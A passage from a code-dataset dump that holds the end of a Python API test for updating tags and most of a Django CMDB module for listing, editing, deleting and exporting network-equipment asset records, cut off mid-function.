title=title,\n description=description,\n ),\n ):\n assert status == 200\n assert response.json['title'] == title\n assert response.json['description'] == description\n assert response.json['id'] == self.tag1.id\n\n when('Tag not found', url_parameters=dict(id=0))\n assert status == 404\n\n when(\n 'Intended tag with string type not found',\n url_parameters=dict(id='Alphabetical')\n )\n assert status == 404\n\n when(\n 'Title is repetitive',\n json=dict(title=self.tag2.title)\n )\n assert status == '600 Repetitive Title'\n\n when(\n 'Title is as the same it is',\n json=dict(title=title)\n )\n assert status == 200\n\n when('Trying to pass without form parameters', json={})\n assert status == '708 Empty Form'\n\n when(\n 'Title length is more than limit',\n json=dict(title=((50 + 1) * 'a'))\n )\n assert status == '704 At Most 50 Characters Are Valid For Title'\n\n when(\n 'Trying to pass with none title',\n json=dict(title=None)\n )\n assert status == '727 Title Is Null'\n\n when(\n 'Description length is less than limit',\n json=Update(description=((8192 + 1) * 'a')),\n )\n assert status == '703 At Most 8192 Characters Are Valid For ' \\\n 'Description'\n\n self.login(\n email=self.member2.email,\n organization_id=self.organization2.id\n )\n when(\n 'Updating a tag by a member from another organization',\n authorization=self._authentication_token\n )\n assert status == 403\n\n when(\n 'Invalid parameter is in the form',\n json=dict(invalid_param='External parameter'),\n )\n assert status == '707 Invalid field, only following fields are ' \\\n 'accepted: title, description'\n\n when('Request is not authorized', authorization=None)\n assert status == 401\n\n","repo_name":"Carrene/dolphin","sub_path":"tests/test_tag_update.py","file_name":"test_tag_update.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"118776829","text":"#!/usr/bin/env python\n\"\"\"\n该模块是cmdb中所有关于设备资产信息的处理方法\nauthor: wangsong 2016-09-20\n\"\"\"\n\nimport json\nfrom datetime import datetime\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\nfrom afcat.account.core.permission import operator_audit_decorator\nfrom afcat.api.libs.public import Logger, response_format\nfrom afcat.cmdb import models\nfrom afcat.cmdb.libs import base, common\n\nlogger = Logger(__name__)\n\n\ndef get_asset_list(page_index, conditions, custid, perm_id_list=None, per_count=None):\n \"\"\"\n 获取设备资产的基础信息(首页显示的所有资产信息)\n :param conditions: str类型,查询过滤条件,目前仅支持: 按设备编号、资产编号、型号、管理IP模糊匹配\n :param page_index: 当前页码\n :param request: get\n :return: 所有资产信息的列表\n \"\"\"\n _result_list = list()\n result = response_format()\n page_split_result = {\"record\": _result_list, \"addperm\": True}\n\n try:\n record_list = _load_equipment_list(conditions.strip(), custid, perm_id_list)\n # 获得分页结果\n page_split_result.update(common.page_split(record_list, page_index, per_count))\n # 获取分页后的记录\n equipment_obj_list = page_split_result.get(\"record\")\n\n if record_list.count() > 0:\n for equipment_obj in equipment_obj_list:\n equipment_info = dict(id=equipment_obj.id, assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno,\n unitinfo=equipment_obj.slotindex,\n assettype=equipment_obj.assettype.name if equipment_obj.assettype else \"\",\n room=equipment_obj.room.name if equipment_obj.room else \"\",\n cabinet=equipment_obj.cabinet,\n model=equipment_obj.model,\n netarea=equipment_obj.netarea.name if equipment_obj.netarea else 
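`get_asset_list` above leans on the project's `common.page_split` helper (not shown in this file) and, on error, falls back to `num_pages`/`curr_page`/`total_count` defaults. For reference, here is a `page_split`-shaped sketch built on Django's own `Paginator`, returning the same keys; this illustrates the contract, it is not the project's implementation:

```python
from django.core.paginator import EmptyPage, Paginator

def page_split(record_list, page_index, per_count=20):
    """Sketch of a page_split-style helper using Django's Paginator."""
    paginator = Paginator(record_list, per_count)
    try:
        page = paginator.page(page_index)
    except EmptyPage:
        page = paginator.page(paginator.num_pages)  # clamp to the last page
    return {
        "record": page.object_list,
        "num_pages": paginator.num_pages,
        "curr_page": page.number,
        "total_count": paginator.count,
    }

print(page_split(list(range(95)), 2)["curr_page"])  # works on querysets or lists
```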
\"\",\n factory=equipment_obj.factory.name if equipment_obj.factory else \"\",\n manageip=equipment_obj.manageip,\n powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n staffs=base.get_asset_staffs_str(equipment_obj),\n portmapcount=_get_portmapping_count(equipment_obj),\n changeperm=True,\n delperm=True)\n _result_list.append(equipment_info)\n page_split_result.update({\"record\": _result_list})\n except Exception as e:\n logger.error(e)\n page_split_result.update({\"num_pages\": 1, \"curr_page\": 1, \"total_count\": 0})\n\n finally:\n result[\"data\"] = page_split_result\n return result\n\n\ndef _get_portmapping_count(equipment_obj):\n \"\"\"\n 获取网络设备的端口隐射数,删除设备时根据端口做判断,有端口隐射信息的无法删除\n :return:\n \"\"\"\n map_count = 0\n try:\n if not equipment_obj:\n pass\n else:\n # 获取所有板卡对象\n e_card = equipment_obj.related_card.select_related()\n if e_card.count() > 0:\n card_id_list = [c.id for c in e_card]\n # 获取所有板卡的端口信息\n c_ports = models.PortList.objects.filter(flag=2, object_pk__in=card_id_list)\n # 获取该设备的板卡的端口隐射数\n map_count = models.PortMapping.objects.filter(\n Q(localport__in=c_ports) | Q(targetport__in=c_ports)).count()\n except Exception as e:\n logger.error(e)\n\n return map_count\n\n\ndef _load_equipment_list(conditions, custid, perm_id_list=None):\n \"\"\"\n 根据条件获取所有设备信息列表\n :type perm_id_list: 允许访问的设备ID列表(权限控制)\n :param conditions: 条件\n :return:\n \"\"\"\n record_list = list\n try:\n if not conditions and perm_id_list is None:\n # 如果未加条件或superuser\n record_list = models.Equipment.objects.filter(cust_id=custid)\n else:\n if perm_id_list is None: # superuser\n record_list = models.Equipment.objects.filter(Q(model__contains=conditions) |\n Q(sn__contains=conditions) |\n Q(assetname__contains=conditions) |\n Q(manageip__contains=conditions) |\n Q(netarea__name__contains=conditions) |\n Q(room__name__contains=conditions) |\n Q(cabinet__contains=conditions) |\n Q(assettype__name__contains=conditions),\n cust_id=custid)\n else:\n # 获取指定权限下的设备信息\n record_list = models.Equipment.objects.filter(Q(model__contains=conditions) |\n Q(sn__contains=conditions) |\n Q(assetname__contains=conditions) |\n Q(manageip__contains=conditions) |\n Q(netarea__name__contains=conditions) |\n Q(room__name__contains=conditions) |\n Q(cabinet__contains=conditions) |\n Q(assettype__name__contains=conditions),\n cust_id=custid,\n id__in=perm_id_list)\n except Exception as e:\n logger.error(e)\n\n return record_list\n\n\ndef get_asset_details(asset_id):\n \"\"\"\n 获取设备的详细信息\n :param asset_id: 设备ID\n :return: 字典格式数据\n \"\"\"\n result = dict()\n data = response_format()\n try:\n equipment_obj = models.Equipment.objects.get(id=asset_id)\n equipment_info = _equipment_details(equipment_obj)\n equipment_exten_fields = _get_extend_field_values(equipment_obj)\n equipment_staffs = _equipments_staffs_details(equipment_obj)\n equipment_cards = _equipment_card_details(equipment_obj)\n result.update({\"server\": equipment_info, \"staffs\": equipment_staffs, \"card\": equipment_cards,\n \"extend\": equipment_exten_fields})\n data[\"data\"] = result\n # data = dict(data=result, status=True, error=\"\")\n except ObjectDoesNotExist as e:\n data[\"info\"] = \"未找到指定的设备信息\"\n data[\"status\"] = False\n logger.error(e)\n return data\n\n\ndef _equipment_details(equipment_obj):\n \"\"\"\n 设备详情,页面展示列表详情时用\n :param equipment_obj: 设备对象\n :return:\n \"\"\"\n try:\n _result = dict(id=equipment_obj.id, assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno, sn=equipment_obj.sn,\n assettype=equipment_obj.assettype.name if 
equipment_obj.assettype else \"\",\n room=equipment_obj.room.name if equipment_obj.room else \"\",\n roomaddr=equipment_obj.room.address if equipment_obj.room else \"\",\n cabinet=equipment_obj.cabinet,\n tradedate=datetime.strftime(equipment_obj.tradedate,\n \"%Y-%m-%d\") if equipment_obj.tradedate else \"\",\n expiredate=datetime.strftime(equipment_obj.expiredate,\n \"%Y-%m-%d\") if equipment_obj.expiredate else \"\",\n factory=equipment_obj.factory.name if equipment_obj.factory else \"\",\n provider=equipment_obj.provider.name if equipment_obj.provider else \"\",\n serviceprovider=equipment_obj.serviceprovider.name if equipment_obj.serviceprovider else \"\",\n model=equipment_obj.model, powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n netarea=equipment_obj.netarea.name if equipment_obj.netarea else \"\",\n status=equipment_obj.status.status if equipment_obj.status else \"\",\n manageip=equipment_obj.manageip, portcount=equipment_obj.portcount,\n slotindex=equipment_obj.slotindex, remark=equipment_obj.remark\n )\n return _result\n except Exception as e:\n logger.error(e)\n return None\n\n\ndef _get_extend_field_values(equipment_obj):\n \"\"\"\n 获取网络设备的扩展(自定义属性)信息\n :param equipment_obj: 设备对象\n :return: 扩展属性字典[{'label':'IOS版本','value':'v4.00.18,build0689b689,140731'},...]\n \"\"\"\n _result = list()\n try:\n # 获取所有自定义字段信息\n customer_fields_obj = common.get_table_extend_fields(equipment_obj.cust_id, \"Equipment\")\n # 获取各字段的值\n if len(customer_fields_obj) > 0:\n for field in customer_fields_obj:\n field_label = field.get(\"label\")\n field_value = getattr(equipment_obj, field.get(\"to_field\"))\n _result.append({'label': field_label, 'value': field_value})\n except Exception as e:\n logger.error(e)\n return _result\n\n\ndef _equipments_staffs_details(equipment_obj):\n \"\"\"\n 获取设备资产的联系人信息\n :param equipment_obj: 资产对象\n :return:\n \"\"\"\n _staffs_list = list()\n staffs_obj_List = equipment_obj.related_staffs.select_related()\n if staffs_obj_List.count() > 0:\n for staffs_obj in staffs_obj_List:\n _staff_dict = dict(id=staffs_obj.id,\n staff_id=staffs_obj.staff_id,\n name=staffs_obj.staff.name,\n mobile=staffs_obj.staff.mobile,\n tel=staffs_obj.staff.tel,\n email=staffs_obj.staff.email,\n role=staffs_obj.role.role_name if staffs_obj.role else \"\",\n remark=staffs_obj.remark\n )\n _staffs_list.append(_staff_dict)\n return _staffs_list\n\n\ndef _equipment_card_details(equipment_obj):\n \"\"\"\n 获取网络设备对应的板卡及端口映射关系\n :param equipment_obj: 所属板卡对象\n :return: 板卡信息[{\"assetno\":\"4938493\",\"sn\":\"sn0001\",\"slot\":1,\"model\":\"xxx\",\n \"port\":[{\"localport\":\"port0\",\"targetport\":\"pppp\",\"targettype\":\"host001:网卡(网卡0)},{},{} ]}, {} ]\n \"\"\"\n card_list = list()\n try:\n all_board_card = models.EquipmentBoardCard.objects.filter(equipment=equipment_obj)\n for card_obj in all_board_card:\n # 网络设备的板卡信息\n card_info = dict(id=card_obj.id, assetno=card_obj.assetno, sn=card_obj.sn, cardname=card_obj.cardname,\n slot=card_obj.slot, model=card_obj.model, remark=card_obj.remark)\n card_ports = _equipment_port_list(card_obj)\n # print(card_ports)\n card_info.update({\"portcount\": len(card_ports.get(\"ports\"))})\n card_info.update(card_ports)\n card_list.append(card_info)\n\n return card_list\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef _equipment_port_list(card_obj):\n \"\"\"\n 获取板卡对应的端口以及端口的映射信息\n :param card_obj:\n :return: 返回端口映射表\n \"\"\"\n port_map_detail = dict(ports=list(), maps=list())\n try:\n # 获取该板卡下的所有端口信息\n ports_objs = 
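`_get_extend_field_values` above maps user-defined field definitions (`label` plus `to_field`) onto model attributes with `getattr`. A defensive variant passes a default so a stale definition (a `to_field` that no longer exists on the model) degrades to an empty value instead of raising; a minimal illustration, with a plain class standing in for the model instance and the IOS-version example taken from the docstring above:

```python
class FakeEquipment:
    customer001 = "v4.00.18,build0689b689,140731"

fields = [
    {"label": "IOS版本", "to_field": "customer001"},
    {"label": "已删除字段", "to_field": "customer999"},  # stale definition
]

values = [
    {"label": f["label"], "value": getattr(FakeEquipment, f["to_field"], "")}
    for f in fields
]
print(values)  # the stale field yields "" instead of AttributeError
```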
models.PortList.objects.filter(flag=2, object_pk=card_obj.id).all()\n # 获取端口映射信息\n if ports_objs.count() > 0:\n port_maps = models.PortMapping.objects.filter(Q(localport__in=ports_objs) | Q(targetport__in=ports_objs))\n # 加载端口信息\n for port in ports_objs:\n if port.related_local.select_related().count() > 0 or port.related_target.select_related().count() > 0:\n port_map_detail[\"ports\"].append(dict(id=port.id, portname=port.portname, porttype=port.porttype,\n vlan=port.vlan, remark=port.remark, hasmap=1))\n else:\n port_map_detail[\"ports\"].append(dict(id=port.id, portname=port.portname, porttype=port.porttype,\n vlan=port.vlan, remark=port.remark, hasmap=0))\n\n if port_maps.count() > 0:\n for mapping in port_maps:\n # 如果映射关系表的端口是本端\n if mapping.localport in ports_objs:\n target_port = mapping.targetport\n local_port = mapping.localport\n else:\n target_port = mapping.localport\n local_port = mapping.targetport\n # 获取映射信息\n if target_port:\n # 获取对端设备的详细信息\n target_card_info = _get_card_by_portid(target_port.id)\n map_info = dict(targetportid=target_port.id, targetportname=target_port.portname,\n targetporttype=target_port.porttype, targetasset=target_card_info,\n remark=target_port.remark, mapid=mapping.id)\n else:\n map_info = dict(targetportid=\"\", targetportname=\"\", targetporttype=\"\", targetasset=\"\",\n mapid=mapping.id)\n\n if local_port:\n map_info.update(dict(localportname=local_port.portname))\n\n port_map_detail[\"maps\"].append(map_info)\n else:\n pass\n\n except Exception as e:\n logger.error(e)\n return port_map_detail\n\n\ndef _get_card_by_portid(port_id):\n \"\"\"\n 通过portlist表中的id获取所属的设备的信息\n :param port_id: 端口id\n :return: 返回设备的信息(str)\n \"\"\"\n try:\n port_obj = models.PortList.objects.get(id=port_id)\n if port_obj.flag == 1:\n # 服务器资产的板卡端口\n card_obj = models.ServerBoardCard.objects.get(id=port_obj.object_pk)\n asset_info = \"{0}:{1}\".format(card_obj.server.hostname,\n \"网卡\" if card_obj.cardtype == 1 else \"存储卡\")\n\n if port_obj.flag == 2:\n # 设备资产的板卡端口\n card_obj = models.EquipmentBoardCard.objects.get(id=port_obj.object_pk)\n asset_info = \"{0}:{1}({2})\".format(card_obj.equipment.assetname, card_obj.equipment.model,\n card_obj.cardname)\n\n return asset_info\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef get_asset_base_info(sid):\n \"\"\"\n 获取设备资产的信息,对于关联关系的仅显示id,编辑时用\n :param sid: 设备资产id\n :return:\n \"\"\"\n try:\n equipment_obj = models.Equipment.objects.get(id=sid)\n # 获取基础数据\n equipment_info = dict(id=equipment_obj.id,\n assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno, sn=equipment_obj.sn,\n assettype=equipment_obj.assettype_id, room=equipment_obj.room_id,\n cabinet=equipment_obj.cabinet, powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n datacenter=equipment_obj.room.center_id if equipment_obj.room else \"\",\n tradedate=datetime.strftime(equipment_obj.tradedate,\n \"%Y-%m-%d\") if equipment_obj.tradedate else \"\",\n expiredate=datetime.strftime(equipment_obj.expiredate,\n \"%Y-%m-%d\") if equipment_obj.expiredate else \"\",\n factory=equipment_obj.factory_id, model=equipment_obj.model,\n provider=equipment_obj.provider_id, serviceprovider=equipment_obj.serviceprovider_id,\n netarea=equipment_obj.netarea_id, status=equipment_obj.status_id,\n manageip=equipment_obj.manageip, portcount=equipment_obj.portcount,\n slotindex=equipment_obj.slotindex, remark=equipment_obj.remark\n )\n # 获取用户自定义扩展字段的数据\n extend_fields = common.get_table_extend_fields(equipment_obj.cust_id, 
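`_equipment_port_list` above copes with a symmetric mapping table: a `PortMapping` row may store a given port at either end, so the code swaps `localport`/`targetport` when the row was written the other way round. That orientation step in isolation, with namedtuples standing in for the ORM rows:

```python
from collections import namedtuple

Port = namedtuple("Port", "id portname")
Mapping = namedtuple("Mapping", "localport targetport")

def orient(mapping, own_port_ids):
    """Return (our_end, other_end) regardless of how the row was stored."""
    if mapping.localport and mapping.localport.id in own_port_ids:
        return mapping.localport, mapping.targetport
    return mapping.targetport, mapping.localport

m = Mapping(localport=Port(7, "E1/0"), targetport=Port(3, "Gi0/1"))
print(orient(m, own_port_ids={3}))  # our end is port 3, though stored as targetport
```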
equipment_obj._meta.object_name)\n if len(extend_fields) > 0:\n for field in extend_fields:\n equipment_info.update({field.get(\"to_field\"): getattr(equipment_obj, field.get(\"to_field\"))})\n return equipment_info\n except ObjectDoesNotExist as e:\n logger.error(\"未找到指定ID的网络设备资产信息\")\n return \"\"\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef load_related_base_configuration(custid):\n \"\"\"\n 获取编辑或添加时依赖的基表数据\n :return: 字典\n \"\"\"\n related_tables = [\"BaseDataCenter\", \"BaseMachineRoom\", \"BaseNetArea\",\n \"BaseAssetCabinet\", \"BaseFactory\", \"BaseAssetStatus\", \"BaseEquipmentType\"]\n related_data = base.get_base_data(custid, related_tables)\n # 获取自定义的扩展字段\n extend_field = common.get_table_extend_fields(custid, \"Equipment\")\n related_data.update({\"extend\": extend_field})\n return related_data\n\n\n@operator_audit_decorator(\"Equipment\")\ndef edit_asset(data):\n \"\"\"\n 添加 和 修改设备资产信息\n :param action: 要执行的动作 edit / add\n :param sid: 如果是edit, 资产id\n :param data: post的数据\n :return:\n \"\"\"\n result = response_format()\n try:\n # print(\"e data:\", data)\n asset_data = data.get(\"value\", \"\")\n action = data.get(\"action\")\n sid = asset_data.get(\"id\", 0)\n user = data.get(\"user\")\n custid = data.get(\"custid\")\n\n if asset_data:\n asset_data = common.filter_dict(asset_data)\n # print(asset_data)\n if action == \"edit\":\n asset_data.update(dict(updateuser=user.username, updatedate=datetime.now()))\n asset_obj = models.Equipment.objects.filter(id=int(sid))\n if asset_obj.first().manageip != asset_data.get(\"manageip\", \"\"):\n result = data_validate(asset_data.get(\"sn\", \"\"), asset_data.get(\"manageip\", \"\"), custid, sid)\n if result[\"status\"]:\n common.change_ip_status(custid, asset_obj.first().manageip, \"ALLOCATED\")\n common.change_ip_status(custid, asset_data.get(\"manageip\", \"\"), \"USED\", asset_obj.first().__str__())\n\n asset_obj.update(**asset_data)\n result[\"info\"] = \"修改成功\"\n else:\n asset_obj.update(**asset_data)\n result[\"info\"] = \"修改成功\"\n\n elif action == \"new\":\n # 检查sn是否重复\n result = data_validate(asset_data.get(\"sn\", \"\"), asset_data.get(\"manageip\", \"\"), custid)\n if result[\"status\"]:\n asset_data.update(dict(id=base.nextid(models.Equipment._meta.db_table, custid),\n updateuser=user.username,\n createuser=user.username,\n cust_id=custid))\n asset_no = common.create_assno()\n asset_data.update({\"assetno\": asset_no})\n new_asset = models.Equipment.objects.create(**asset_data)\n # 修改IP地址的使用状态为已使用\n common.change_ip_status(custid, asset_data.get(\"manageip\"), \"USED\", new_asset.__str__())\n result[\"data\"] = dict(id=new_asset.id, equipmentname=new_asset.assetname)\n result[\"info\"] = \"添加成功\"\n\n elif action == \"delete\":\n asset_obj = models.Equipment.objects.filter(id=sid)\n if not asset_obj:\n result[\"info\"] = \"未找到指定记录\"\n result[\"status\"] = False\n result[\"category\"] = \"error\"\n else:\n # 获取该网络设备记录的所有依赖表记录\n related_data = load_asset_related_data(sid)\n # 保存历史数据\n base.save_del_history(\"Equipment\", related_data, user, custid)\n # 删除板卡端口数据\n if len(json.loads(related_data).get(\"PortList\", [])) > 0:\n port_id_list = list()\n for port in json.loads(related_data).get(\"PortList\"):\n port_id_list.append(port.get(\"id\"))\n # print(port_id_list)\n models.PortList.objects.filter(id__in=port_id_list).delete()\n # 修改IP地址的使用状态为待回收\n common.change_ip_status(custid, asset_obj.first().manageip, \"RECOVER\")\n # 删除记录\n asset_obj.delete()\n result[\"info\"] = \"删除成功\"\n except Exception as e:\n 
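`edit_asset` above threads an IP-address lifecycle through its three actions: editing a device onto a new management IP releases the old address back to `ALLOCATED` and marks the new one `USED`; creating marks the address `USED`; deleting moves it to `RECOVER`. A toy trace of just those transitions (status strings taken from the calls above; the real `common.change_ip_status` presumably also records which device uses the address):

```python
ip_pool = {"10.0.0.5": "ALLOCATED", "10.0.0.6": "ALLOCATED"}

def change_ip_status(ip, status, used_by=None):
    """Toy stand-in for common.change_ip_status above."""
    if ip in ip_pool:
        ip_pool[ip] = status

# edit: device moves from .5 to .6
change_ip_status("10.0.0.5", "ALLOCATED")         # release the old management IP
change_ip_status("10.0.0.6", "USED", "switch-1")  # claim the new one
# delete: device removed, its IP queued for recycling
change_ip_status("10.0.0.6", "RECOVER")
print(ip_pool)  # {'10.0.0.5': 'ALLOCATED', '10.0.0.6': 'RECOVER'}
```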
result[\"status\"] = False\n result[\"category\"] = \"error\"\n result[\"info\"] = \"系统错误!\"\n logger.error(e)\n return result\n\n\ndef data_validate(sn, manageip, custid, obj_id=None):\n \"\"\"\n 验证提交的sn和ip地址的合法性\n :param sn:\n :param manageip:\n :param custid:\n :param obj_id:\n :return:\n \"\"\"\n result = response_format()\n if _check_exists(sn, manageip, custid, obj_id):\n result[\"info\"] = \"SN或管理IP地址重复!\"\n result[\"category\"] = \"warning\"\n result[\"status\"] = False\n else:\n if not common.ip_allocated(manageip, custid):\n result[\"info\"] = \"管理IP未分配或已被使用!\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n else:\n result[\"status\"] = True\n return result\n\n\ndef _check_exists(sn, manageip, custid, obj_id=None):\n \"\"\"\n 添加和修改网络设备时检测时检测重复记录,主要检测sn、manageip\n :param sn: sn编号\n :param manageip: 管理IP\n :param custid: 客户编号,同一个客户下的不可以重复,不同客户的可以重复\n :param obj_id: 对象id,编辑的时候判断除自身之外的其它记录\n :return: 有重复记录True / 无重复记录False\n \"\"\"\n exists_flag = False\n try:\n eq = models.Equipment.objects.filter(sn=sn, manageip=manageip, cust_id=custid)\n if obj_id:\n eq = eq.exclude(id=obj_id)\n if eq.count() > 0:\n exists_flag = True\n except Exception as e:\n logger.error(e)\n return exists_flag\n\n\ndef export_excel(custid, **kwargs):\n \"\"\"\n 导出设备excel功能\n :param kwargs:\n :return:\n \"\"\"\n from afcat.cmdb.libs.excel import Excel\n conditions = kwargs.get(\"conditions\", \"\")[0]\n e_obj_list = _load_equipment_list(conditions, custid)\n try:\n # create excel file object\n excel_obj = Excel()\n _excel_export_data(excel_obj, e_obj_list)\n except Exception as e:\n logger.error(e)\n finally:\n excel_obj.close()\n return excel_obj.file\n\n\n# def _excel_export_main_info(excel_obj, record_obj_list):\n# \"\"\"\n# 导出网络设备的基本信息\n# :return:\n# \"\"\"\n# excel_title = [\n# (\"序号\", 5), (\"设备名称\", 20), (\"设备类型\", 15), (\"应用用途\", 25), (\"管理IP\", 15), (\"所属机房\", 25), (\"所在机柜\", 10),\n# (\"U位\", 10), (\"设备型号\", 20), (\"序列号\", 25), (\"电源数量\", 10), (\"联系人\", 20), (\"网络区域\", 20), (\"厂商\", 25),\n# (\"购买日期\", 15), (\"过保日期\", 15), (\"状态\", 15), (\"备注\", 20)\n# ]\n# excel_rows = list()\n# row_index = 1\n# try:\n# sheet_obj = excel_obj.create_sheet(u\"网络设备\")\n# for e_obj in record_obj_list:\n# row = []\n# info = get_asset_details(e_obj.id)[\"data\"]\n# asset_info = info.get(\"server\", \"\")\n# asset_staff_info = info.get(\"staffs\", \"\")\n# extend_field = common.list_to_dict(info.get(\"extend\"), 'label', 'value') # 扩展字段\n# print(extend_field)\n# # index\n# row.append(row_index)\n# # assetname\n# row.append(asset_info.get(\"assetname\"))\n# # assettype\n# row.append(asset_info.get(\"assettype\"))\n# # assetusetype\n# row.append(asset_info.get(\"usetype\"))\n# # manageip\n# row.append(asset_info.get(\"manageip\"))\n# # room\n# row.append(asset_info.get(\"room\"))\n# # cabinet\n# row.append(asset_info.get(\"cabinet\"))\n# # slotindex\n# row.append(asset_info.get(\"slotindex\"))\n# # model\n# row.append(asset_info.get(\"model\"))\n# # sn\n# row.append(asset_info.get(\"sn\"))\n# # powercount\n# row.append(asset_info.get(\"powertype\"))\n# # staffs\n# row.append(common.convert_dict_to_str(asset_staff_info, [\"name\", \"role\", \"mobile\"], \"/\"))\n# # netarea\n# row.append(asset_info.get(\"netarea\"))\n# # factory\n# row.append(asset_info.get(\"factory\"))\n# # tradedate\n# row.append(asset_info.get(\"tradedate\"))\n# # expiredate\n# row.append(asset_info.get(\"expiredate\"))\n# # status\n# row.append(asset_info[\"status\"])\n# # remark\n# row.append(asset_info[\"remark\"])\n#\n# 
excel_rows.append(row)\n#\n# row_index += 1\n#\n# excel_obj.write_title(excel_title, sheet_obj)\n# excel_obj.write_row(excel_rows, sheet_obj)\n# except Exception as e:\n# logger.error(e)\n\n\ndef _excel_export_data(excel_obj, record_obj_list):\n \"\"\"\n 专门针对太原银行进行定制的excel导出\n :param excel_obj:\n :param record_obj_list:\n :return:\n \"\"\"\n excel_title = [\n (\"序号\", 5), (\"监控策略\", 20), (\"监控时间段\", 15), (\"设备管理IP\", 15), (\"团体字\", 15), (\"责任人\", 20), (\"逻辑区域\", 15),\n (\"机房位置\", 20), (\"设备类型\", 10), (\"管理组\", 5), (\"管理机构\", 10), (\"所属机构\", 10), (\"地域\", 10), (\"监控需求\", 10),\n (\"特殊需求\", 10), (\"别名\", 10), (\"用途\", 8), (\"房间位置\", 20), (\"机柜编号\", 10), (\"机内位置\", 10), (\"带内管理地址\", 10),\n (\"带外管理地址\", 10), (\"所属环境\", 10), (\"服务开始日期\", 10), (\"过保时间\", 10), (\"供应商\", 5), (\"服务提供商\", 10),\n (\"状态\", 8), (\"服务级别\", 8), (\"厂商\", 10), (\"设备型号\", 8), (\"设备序列号\", 20), (\"名称\", 20), (\"IOS版本\", 20)\n ]\n excel_rows = list()\n row_index = 1\n try:\n sheet_obj = excel_obj.create_sheet(u\"网络设备\")\n for e_obj in record_obj_list:\n row = []\n info = get_asset_details(e_obj.id)[\"data\"]\n print(info)\n asset_info = info.get(\"server\", \"\")\n asset_staff_info = info.get(\"staffs\", \"\")\n extend_field = common.list_to_dict(info.get(\"extend\"), 'label', 'value') # 扩展字段\n # index\n row.append(row_index)\n # 监控策略\n row.append(extend_field.get(excel_title[1][0]))\n # 监控时间段\n row.append(extend_field.get(excel_title[2][0]))\n # manageip\n row.append(asset_info.get(\"manageip\"))\n # 团体字\n row.append(extend_field.get(excel_title[4][0]))\n # staffs\n row.append(common.convert_dict_to_str(asset_staff_info, [\"name\", \"role\", \"mobile\"], \"/\"))\n # 逻辑区域\n row.append(extend_field.get(excel_title[6][0]))\n # room\n row.append(asset_info.get(\"room\"))\n # assettype\n row.append(asset_info.get(\"assettype\"))\n # 管理组\n row.append(extend_field.get(excel_title[9][0]))\n # 管理机构\n row.append(extend_field.get(excel_title[10][0]))\n # 所属机构\n row.append(extend_field.get(excel_title[11][0]))\n # 地域\n row.append(extend_field.get(excel_title[12][0]))\n # 监控需求\n row.append(extend_field.get(excel_title[13][0]))\n # 特殊需求\n row.append(extend_field.get(excel_title[14][0]))\n # 别名\n row.append(extend_field.get(excel_title[15][0]))\n # assetusetype\n row.append(asset_info.get(\"usetype\"))\n # roomaddress\n row.append(asset_info.get(\"roomaddr\"))\n # cabinet\n row.append(asset_info.get(\"cabinet\"))\n # slotindex\n row.append(asset_info.get(\"slotindex\"))\n # 带内地址\n row.append(extend_field.get(excel_title[20][0]))\n # 带外地址\n row.append(extend_field.get(excel_title[21][0]))\n # netarea\n row.append(asset_info.get(\"netarea\"))\n # tradedate\n row.append(asset_info.get(\"tradedate\"))\n # expiredate\n row.append(asset_info.get(\"expiredate\"))\n # provider\n row.append(asset_info.get(\"provider\"))\n # service provider\n row.append(asset_info.get(\"serviceprovider\"))\n # status\n row.append(asset_info[\"status\"])\n # 服务级别\n row.append(extend_field.get(excel_title[28][0]))\n # factory\n row.append(asset_info.get(\"factory\"))\n # model\n row.append(asset_info.get(\"model\"))\n # sn\n row.append(asset_info.get(\"sn\"))\n # assetname\n row.append(asset_info.get(\"assetname\"))\n # remark\n row.append(extend_field.get(excel_title[33][0]))\n\n excel_rows.append(row)\n\n row_index += 1\n\n excel_obj.write_title(excel_title, sheet_obj)\n excel_obj.write_row(excel_rows, sheet_obj)\n except Exception as e:\n logger.error(e)\n\n\ndef load_asset_related_data(eid):\n \"\"\"\n 获得所有设备资产及关联数据的值\n :param eid: 资产设备id\n :return: json格式\n 
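`_excel_export_data` above (the bank-specific export) assembles each row with thirty-odd positional `row.append` calls that must stay in lock-step with `excel_title` by index. A column-spec list keeps the header, width, and value logic for each column in one place; a short sketch with a few of the columns (the getters here are illustrative):

```python
# each entry: (header, width, getter); getters receive the per-device info dicts
COLUMNS = [
    ("设备管理IP", 15, lambda info, ext: info.get("manageip")),
    ("机房位置",   20, lambda info, ext: info.get("room")),
    ("监控策略",   20, lambda info, ext: ext.get("监控策略")),  # extended field
    ("设备序列号", 20, lambda info, ext: info.get("sn")),
]

def build_row(index, asset_info, extend_field):
    return [index] + [get(asset_info, extend_field) for _, _, get in COLUMNS]

excel_title = [("序号", 5)] + [(h, w) for h, w, _ in COLUMNS]
print(excel_title)
print(build_row(1, {"manageip": "10.1.1.1", "room": "主机房", "sn": "SN001"},
                {"监控策略": "7x24"}))
```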
\"\"\"\n all_data = dict()\n try:\n # 获取设备的记录数据\n asset_objs = models.Equipment.objects.get(id=eid)\n equipment_info = base.get_single_obj_record(asset_objs)\n all_data.update({\"Equipment\": equipment_info})\n\n # 获取g该记录关联的所有数据\n related_data = common.object_related_data(\"Equipment\", eid)\n all_data.update(related_data)\n\n # 获取网络设备记录中关联板卡的端口信息\n # print(all_data)\n card_port_info = list()\n for card in asset_objs.related_card.select_related():\n portlist_obj = models.PortList.objects.filter(object_pk=card.id, flag=2)\n for port_obj in portlist_obj:\n card_port_info.append(base.get_single_obj_record(port_obj))\n\n all_data.update({\"PortList\": card_port_info})\n except Exception as e:\n logger.error(e)\n\n return json.dumps(all_data, cls=common.CJsonEncoder)\n\n\ndef get_id_list(type_obj_list, custid):\n \"\"\"\n 根据设备类型获取设备类型下的所有设备id\n :param type_obj_list: 设备类型对象列表\n :return: 设备id列表\n \"\"\"\n id_list = list()\n equipments = models.Equipment.objects.filter(assettype__in=type_obj_list, cust_id=custid).values(\"id\")\n for e in equipments:\n 